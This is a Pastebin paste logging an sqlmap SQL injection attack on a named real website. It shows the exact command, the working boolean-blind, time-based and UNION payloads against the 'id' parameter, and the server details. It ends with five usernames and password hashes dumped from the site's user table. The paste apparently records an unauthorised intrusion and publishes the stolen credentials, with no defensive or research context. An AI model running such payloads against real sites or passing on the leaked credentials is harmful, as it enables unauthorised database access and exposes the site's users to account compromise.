Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $ python sqlmap.py -u http://www.gilbertogil.com.br/sec_video.php?id=13 -D c3gilbertogil -T base_users_tb -C username,password --dump --random-agent
- ___
- __H__
- ___ ___["]_____ ___ ___ {1.1.12.12#dev}
- |_ -| . [,] | .'| . |
- |___|_ [.]_|_|_|__,| _|
- |_|V |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 23:08:56
- [23:08:56] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.10 (intrepid) Firefox/3.0.9' from file '/home/Frenetic/SQLMAP/txt/user-agents.txt'
- [23:08:57] [INFO] resuming back-end DBMS 'mysql'
- [23:08:57] [INFO] testing connection to the target URL
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=13' AND 2434=2434 AND 'gPcx'='gPcx
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id=13' AND SLEEP(5) AND 'hUwQ'='hUwQ
- Type: UNION query
- Title: Generic UNION query (NULL) - 7 columns
- Payload: id=-1613' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a6b7671,0x646f4476526a4a74575a764358577548516a50636e7a4d6159545a6a6d6b446b5a435a4455654474,0x7171706a71),NULL,NULL,NULL-- KiEz
- ---
- [23:08:57] [INFO] the back-end DBMS is MySQL
- web server operating system: Linux Debian 8.0 (jessie)
- web application technology: Apache 2.4.10, PHP 5.3.24
- back-end DBMS: MySQL >= 5.0.12
- [23:08:57] [INFO] fetching entries of column(s) 'password, username' for table 'base_users_tb' in database 'c3gilbertogil'
- [23:08:58] [INFO] used SQL query returns 5 entries
- [23:08:58] [INFO] retrieved: "oq3/AIt8lXw","root"
- [23:08:58] [INFO] retrieved: "QTWqXP5ClNY","refazenda"
- [23:08:58] [INFO] retrieved: "0I758BnwugY","fafa"
- [23:08:58] [INFO] retrieved: "bQFHDQvmY5w","nelci"
- [23:08:58] [INFO] retrieved: "2o.HtB6Xztw","julia"
- Database: c3gilbertogil
- Table: base_users_tb
- [5 entries]
- +-----------+-------------+
- | username | password |
- +-----------+-------------+
- | root | oq3/AIt8lXw |
- | refazenda | QTWqXP5ClNY |
- | fafa | 0I758BnwugY |
- | nelci | bQFHDQvmY5w |
- | julia | 2o.HtB6Xztw |
- +-----------+-------------+
- [23:08:58] [INFO] table 'c3gilbertogil.base_users_tb' dumped to CSV file '/home/Frenetic/.sqlmap/output/www.gilbertogil.com.br/dump/c3gilbertogil/base_users_tb.csv'
- [23:08:58] [INFO] fetched data logged to text files under '/home/Frenetic/.sqlmap/output/www.gilbertogil.com.br'
- [*] shutting down at 23:08:58
Add Comment
Please, Sign In to add comment